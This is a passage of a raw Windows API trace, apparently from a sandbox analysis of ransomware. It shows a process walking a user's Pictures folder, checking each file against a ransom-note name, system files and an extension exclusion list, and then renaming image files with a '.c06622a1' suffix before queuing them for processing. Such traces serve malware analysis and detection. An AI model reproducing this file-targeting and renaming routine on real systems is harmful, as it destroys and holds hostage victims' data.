lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\hElEG0AIJDp_.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\heleg0aijdp_.gif.c06622a1"), dwFlags=0x8) returned 1 [0155.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\hElEG0AIJDp_.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\heleg0aijdp_.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x668 [0155.926] CreateIoCompletionPort (FileHandle=0x668, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.926] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4ca0020 [0155.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x66f9bf2f [0155.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x182525b4 [0155.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5b3fc562 [0155.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x56217d5f [0155.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1876abda [0155.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1303df1b [0155.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5f2c6012 [0155.932] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4c33841d [0155.935] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4ca0094, Length=0x80) returned 0x58b557f0 [0155.935] RtlComputeCrc32 (PartialCrc=0x57f0, Buffer=0x4ca0094, Length=0x80) returned 0xe6e54c39 [0155.935] RtlComputeCrc32 (PartialCrc=0x4c39, Buffer=0x4ca0094, Length=0x80) returned 0x9c80fbc1 [0155.935] RtlComputeCrc32 (PartialCrc=0xfbc1, Buffer=0x4ca0094, Length=0x80) returned 0xf83c5f8e [0155.936] RtlComputeCrc32 (PartialCrc=0x5f8e, Buffer=0x4ca0094, Length=0x80) returned 0x9d39c592 [0155.936] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ca0020) returned 1 [0155.936] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0155.936] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0155.936] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81ffbf50, ftCreationTime.dwHighDateTime=0x1d5e098, ftLastAccessTime.dwLowDateTime=0x75701040, ftLastAccessTime.dwHighDateTime=0x1d5e53a, ftLastWriteTime.dwLowDateTime=0x75701040, ftLastWriteTime.dwHighDateTime=0x1d5e53a, nFileSizeHigh=0x0, nFileSizeLow=0x1b24, dwReserved0=0x0, dwReserved1=0x0, cFileName="jv 1pC_kCwXk5a2f8Q.gif", cAlternateFileName="JV1PC_~1.GIF")) returned 1 [0155.936] _wcsicmp (_Str1="jv 1pC_kCwXk5a2f8Q.gif", _Str2="README.c06622a1.TXT") returned -8 [0155.936] wcsstr (_Str="jv 1pC_kCwXk5a2f8Q.gif", _SubStr="README") returned 0x0 [0155.936] _wcsicmp (_Str1="autorun.inf", _Str2="jv 1pC_kCwXk5a2f8Q.gif") returned -9 [0155.936] wcslen (_String="autorun.inf") returned 0xb [0155.936] _wcsicmp (_Str1="boot.ini", _Str2="jv 1pC_kCwXk5a2f8Q.gif") returned -8 [0155.936] wcslen (_String="boot.ini") returned 0x8 [0155.936] _wcsicmp (_Str1="bootfont.bin", _Str2="jv 1pC_kCwXk5a2f8Q.gif") returned -8 [0155.936] wcslen (_String="bootfont.bin") returned 0xc [0155.936] _wcsicmp (_Str1="bootsect.bak", _Str2="jv 1pC_kCwXk5a2f8Q.gif") returned -8 [0155.936] wcslen (_String="bootsect.bak") returned 0xc [0155.936] _wcsicmp (_Str1="desktop.ini", _Str2="jv 1pC_kCwXk5a2f8Q.gif") returned -6 [0155.936] wcslen (_String="desktop.ini") returned 0xb [0155.936] _wcsicmp (_Str1="iconcache.db", _Str2="jv 1pC_kCwXk5a2f8Q.gif") returned -1 [0155.936] wcslen (_String="iconcache.db") returned 0xc [0155.936] _wcsicmp (_Str1="ntldr", _Str2="jv 1pC_kCwXk5a2f8Q.gif") returned 4 [0155.936] wcslen (_String="ntldr") returned 0x5 [0155.936] _wcsicmp (_Str1="ntuser.dat", _Str2="jv 1pC_kCwXk5a2f8Q.gif") returned 4 [0155.936] wcslen (_String="ntuser.dat") returned 0xa [0155.936] _wcsicmp (_Str1="ntuser.dat.log", _Str2="jv 1pC_kCwXk5a2f8Q.gif") returned 4 [0155.936] wcslen (_String="ntuser.dat.log") returned 0xe [0155.937] _wcsicmp (_Str1="ntuser.ini", _Str2="jv 1pC_kCwXk5a2f8Q.gif") returned 4 [0155.937] wcslen (_String="ntuser.ini") returned 0xa [0155.937] _wcsicmp (_Str1="thumbs.db", _Str2="jv 1pC_kCwXk5a2f8Q.gif") returned 10 [0155.937] wcslen (_String="thumbs.db") returned 0x9 [0155.937] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0155.937] wcslen (_String="386") returned 0x3 [0155.937] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0155.937] wcslen (_String="adv") returned 0x3 [0155.937] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0155.937] wcslen (_String="ani") returned 0x3 [0155.937] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0155.937] wcslen (_String="bat") returned 0x3 [0155.937] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0155.937] wcslen (_String="bin") returned 0x3 [0155.937] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0155.937] wcslen (_String="cab") returned 0x3 [0155.937] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0155.937] wcslen (_String="cmd") returned 0x3 [0155.937] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0155.937] wcslen (_String="com") returned 0x3 [0155.937] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0155.937] wcslen (_String="cpl") returned 0x3 [0155.937] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0155.938] wcslen (_String="cur") returned 0x3 [0155.938] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0155.938] wcslen (_String="deskthemepack") returned 0xd [0155.938] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0155.938] wcslen (_String="diagcab") returned 0x7 [0155.938] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0155.938] wcslen (_String="diagcfg") returned 0x7 [0155.938] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0155.938] wcslen (_String="diagpkg") returned 0x7 [0155.938] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0155.938] wcslen (_String="dll") returned 0x3 [0155.938] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0155.938] wcslen (_String="drv") returned 0x3 [0155.938] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0155.938] wcslen (_String="exe") returned 0x3 [0155.938] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0155.938] wcslen (_String="hlp") returned 0x3 [0155.938] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0155.938] wcslen (_String="icl") returned 0x3 [0155.938] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0155.938] wcslen (_String="icns") returned 0x4 [0155.938] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0155.938] wcslen (_String="ico") returned 0x3 [0155.938] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0155.938] wcslen (_String="ics") returned 0x3 [0155.938] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0155.938] wcslen (_String="idx") returned 0x3 [0155.938] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0155.938] wcslen (_String="ldf") returned 0x3 [0155.938] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0155.938] wcslen (_String="lnk") returned 0x3 [0155.938] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0155.938] wcslen (_String="mod") returned 0x3 [0155.939] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0155.939] wcslen (_String="mpa") returned 0x3 [0155.939] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0155.939] wcslen (_String="msc") returned 0x3 [0155.939] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0155.939] wcslen (_String="msp") returned 0x3 [0155.939] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0155.939] wcslen (_String="msstyles") returned 0x8 [0155.939] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0155.939] wcslen (_String="msu") returned 0x3 [0155.939] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0155.939] wcslen (_String="nls") returned 0x3 [0155.939] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0155.939] wcslen (_String="nomedia") returned 0x7 [0155.939] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0155.939] wcslen (_String="ocx") returned 0x3 [0155.939] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0155.939] wcslen (_String="prf") returned 0x3 [0155.939] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0155.939] wcslen (_String="ps1") returned 0x3 [0155.939] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0155.939] wcslen (_String="rom") returned 0x3 [0155.939] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0155.939] wcslen (_String="rtp") returned 0x3 [0155.939] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0155.939] wcslen (_String="scr") returned 0x3 [0155.939] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0155.939] wcslen (_String="shs") returned 0x3 [0155.939] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0155.939] wcslen (_String="spl") returned 0x3 [0155.939] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0155.940] wcslen (_String="sys") returned 0x3 [0155.940] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0155.940] wcslen (_String="theme") returned 0x5 [0155.940] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0155.940] wcslen (_String="themepack") returned 0x9 [0155.940] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0155.940] wcslen (_String="wpx") returned 0x3 [0155.940] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0155.940] wcslen (_String="lock") returned 0x4 [0155.940] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0155.940] wcslen (_String="key") returned 0x3 [0155.940] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0155.940] wcslen (_String="hta") returned 0x3 [0155.940] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0155.940] wcslen (_String="msi") returned 0x3 [0155.940] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0155.940] wcslen (_String="pdb") returned 0x3 [0155.940] _wcsicmp (_Str1="sql", _Str2="gif") returned 12 [0155.940] wcslen (_String="sql") returned 0x3 [0155.940] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0155.940] wcslen (_String="sqlite") returned 0x6 [0155.940] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm")) returned 0x10 [0155.940] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0155.940] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" [0155.940] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned 0x4a [0155.940] wcscpy (in: _Dest=0x4560156, _Source="jv 1pC_kCwXk5a2f8Q.gif" | out: _Dest="jv 1pC_kCwXk5a2f8Q.gif") returned="jv 1pC_kCwXk5a2f8Q.gif" [0155.940] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\jv 1pC_kCwXk5a2f8Q.gif", dwFileAttributes=0x80) returned 1 [0155.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\jv 1pC_kCwXk5a2f8Q.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\jv 1pc_kcwxk5a2f8q.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0155.941] SetFilePointerEx (in: hFile=0x620, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.941] ReadFile (in: hFile=0x620, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0155.942] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x82cdfb91 [0155.942] RtlComputeCrc32 (PartialCrc=0xfb91, Buffer=0x3fe3f4, Length=0x80) returned 0x9d507b90 [0155.942] RtlComputeCrc32 (PartialCrc=0x7b90, Buffer=0x3fe3f4, Length=0x80) returned 0x7a98ebca [0155.942] RtlComputeCrc32 (PartialCrc=0xebca, Buffer=0x3fe3f4, Length=0x80) returned 0xdcdea057 [0155.942] RtlComputeCrc32 (PartialCrc=0xa057, Buffer=0x3fe3f4, Length=0x80) returned 0x767db91a [0155.942] CloseHandle (hObject=0x620) returned 1 [0155.942] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0155.942] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\jv 1pC_kCwXk5a2f8Q.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\jv 1pC_kCwXk5a2f8Q.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\jv 1pC_kCwXk5a2f8Q.gif" [0155.942] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\jv 1pC_kCwXk5a2f8Q.gif") returned 0x61 [0155.942] wcscpy (in: _Dest=0x457018a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.942] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\jv 1pC_kCwXk5a2f8Q.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\jv 1pc_kcwxk5a2f8q.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\jv 1pC_kCwXk5a2f8Q.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\jv 1pc_kcwxk5a2f8q.gif.c06622a1"), dwFlags=0x8) returned 1 [0155.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\jv 1pC_kCwXk5a2f8Q.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\jv 1pc_kcwxk5a2f8q.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x620 [0155.945] CreateIoCompletionPort (FileHandle=0x620, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.945] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4d30020 [0155.951] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2a031667 [0155.951] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x38024d5c [0155.951] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xbd5b15b [0155.951] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a86c982 [0155.951] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7ec5a90 [0155.951] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x9271fb0 [0155.951] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2255828f [0155.951] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x39849149 [0155.954] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4d30094, Length=0x80) returned 0xfd28d3e6 [0155.954] RtlComputeCrc32 (PartialCrc=0xd3e6, Buffer=0x4d30094, Length=0x80) returned 0x902bfdc8 [0155.954] RtlComputeCrc32 (PartialCrc=0xfdc8, Buffer=0x4d30094, Length=0x80) returned 0x69176076 [0155.954] RtlComputeCrc32 (PartialCrc=0x6076, Buffer=0x4d30094, Length=0x80) returned 0x7a5cf88f [0155.954] RtlComputeCrc32 (PartialCrc=0xf88f, Buffer=0x4d30094, Length=0x80) returned 0x63809af2 [0155.954] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4d30020) returned 1 [0155.954] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0155.954] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0155.955] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9612dd0, ftCreationTime.dwHighDateTime=0x1d5e2d3, ftLastAccessTime.dwLowDateTime=0x1819d8e0, ftLastAccessTime.dwHighDateTime=0x1d5e1f2, ftLastWriteTime.dwLowDateTime=0x1819d8e0, ftLastWriteTime.dwHighDateTime=0x1d5e1f2, nFileSizeHigh=0x0, nFileSizeLow=0xdc02, dwReserved0=0x0, dwReserved1=0x0, cFileName="Q1cepvN-j.bmp", cAlternateFileName="Q1CEPV~1.BMP")) returned 1 [0155.955] _wcsicmp (_Str1="Q1cepvN-j.bmp", _Str2="README.c06622a1.TXT") returned -1 [0155.955] wcsstr (_Str="Q1cepvN-j.bmp", _SubStr="README") returned 0x0 [0155.955] _wcsicmp (_Str1="autorun.inf", _Str2="Q1cepvN-j.bmp") returned -16 [0155.955] wcslen (_String="autorun.inf") returned 0xb [0155.955] _wcsicmp (_Str1="boot.ini", _Str2="Q1cepvN-j.bmp") returned -15 [0155.955] wcslen (_String="boot.ini") returned 0x8 [0155.955] _wcsicmp (_Str1="bootfont.bin", _Str2="Q1cepvN-j.bmp") returned -15 [0155.955] wcslen (_String="bootfont.bin") returned 0xc [0155.955] _wcsicmp (_Str1="bootsect.bak", _Str2="Q1cepvN-j.bmp") returned -15 [0155.955] wcslen (_String="bootsect.bak") returned 0xc [0155.955] _wcsicmp (_Str1="desktop.ini", _Str2="Q1cepvN-j.bmp") returned -13 [0155.955] wcslen (_String="desktop.ini") returned 0xb [0155.955] _wcsicmp (_Str1="iconcache.db", _Str2="Q1cepvN-j.bmp") returned -8 [0155.955] wcslen (_String="iconcache.db") returned 0xc [0155.955] _wcsicmp (_Str1="ntldr", _Str2="Q1cepvN-j.bmp") returned -3 [0155.955] wcslen (_String="ntldr") returned 0x5 [0155.955] _wcsicmp (_Str1="ntuser.dat", _Str2="Q1cepvN-j.bmp") returned -3 [0155.955] wcslen (_String="ntuser.dat") returned 0xa [0155.955] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Q1cepvN-j.bmp") returned -3 [0155.955] wcslen (_String="ntuser.dat.log") returned 0xe [0155.955] _wcsicmp (_Str1="ntuser.ini", _Str2="Q1cepvN-j.bmp") returned -3 [0155.955] wcslen (_String="ntuser.ini") returned 0xa [0155.955] _wcsicmp (_Str1="thumbs.db", _Str2="Q1cepvN-j.bmp") returned 3 [0155.955] wcslen (_String="thumbs.db") returned 0x9 [0155.955] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.955] wcslen (_String="386") returned 0x3 [0155.955] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.955] wcslen (_String="adv") returned 0x3 [0155.955] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0155.956] wcslen (_String="ani") returned 0x3 [0155.956] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.956] wcslen (_String="bat") returned 0x3 [0155.956] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.956] wcslen (_String="bin") returned 0x3 [0155.956] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.956] wcslen (_String="cab") returned 0x3 [0155.956] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.956] wcslen (_String="cmd") returned 0x3 [0155.956] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.956] wcslen (_String="com") returned 0x3 [0155.956] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.956] wcslen (_String="cpl") returned 0x3 [0155.956] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.956] wcslen (_String="cur") returned 0x3 [0155.956] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.956] wcslen (_String="deskthemepack") returned 0xd [0155.956] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.956] wcslen (_String="diagcab") returned 0x7 [0155.956] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.956] wcslen (_String="diagcfg") returned 0x7 [0155.956] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.956] wcslen (_String="diagpkg") returned 0x7 [0155.956] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.956] wcslen (_String="dll") returned 0x3 [0155.956] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.956] wcslen (_String="drv") returned 0x3 [0155.956] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.956] wcslen (_String="exe") returned 0x3 [0155.956] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.956] wcslen (_String="hlp") returned 0x3 [0155.957] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.957] wcslen (_String="icl") returned 0x3 [0155.957] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.957] wcslen (_String="icns") returned 0x4 [0155.957] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.957] wcslen (_String="ico") returned 0x3 [0155.957] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.957] wcslen (_String="ics") returned 0x3 [0155.957] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.957] wcslen (_String="idx") returned 0x3 [0155.957] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.957] wcslen (_String="ldf") returned 0x3 [0155.957] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.957] wcslen (_String="lnk") returned 0x3 [0155.957] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.957] wcslen (_String="mod") returned 0x3 [0155.957] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.957] wcslen (_String="mpa") returned 0x3 [0155.957] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.957] wcslen (_String="msc") returned 0x3 [0155.957] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.957] wcslen (_String="msp") returned 0x3 [0155.957] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.957] wcslen (_String="msstyles") returned 0x8 [0155.957] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.957] wcslen (_String="msu") returned 0x3 [0155.957] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.957] wcslen (_String="nls") returned 0x3 [0155.957] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.957] wcslen (_String="nomedia") returned 0x7 [0155.958] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.958] wcslen (_String="ocx") returned 0x3 [0155.958] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.958] wcslen (_String="prf") returned 0x3 [0155.958] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.958] wcslen (_String="ps1") returned 0x3 [0155.958] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.958] wcslen (_String="rom") returned 0x3 [0155.958] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.958] wcslen (_String="rtp") returned 0x3 [0155.958] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.958] wcslen (_String="scr") returned 0x3 [0155.958] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.958] wcslen (_String="shs") returned 0x3 [0155.958] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.958] wcslen (_String="spl") returned 0x3 [0155.958] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.958] wcslen (_String="sys") returned 0x3 [0155.958] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.958] wcslen (_String="theme") returned 0x5 [0155.958] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.958] wcslen (_String="themepack") returned 0x9 [0155.958] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.958] wcslen (_String="wpx") returned 0x3 [0155.958] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.958] wcslen (_String="lock") returned 0x4 [0155.958] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.958] wcslen (_String="key") returned 0x3 [0155.958] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.958] wcslen (_String="hta") returned 0x3 [0155.959] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.959] wcslen (_String="msi") returned 0x3 [0155.959] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.959] wcslen (_String="pdb") returned 0x3 [0155.959] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0155.959] wcslen (_String="sql") returned 0x3 [0155.959] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.959] wcslen (_String="sqlite") returned 0x6 [0155.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm")) returned 0x10 [0155.959] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0155.959] wcscpy (in: _Dest=0x45600c0, 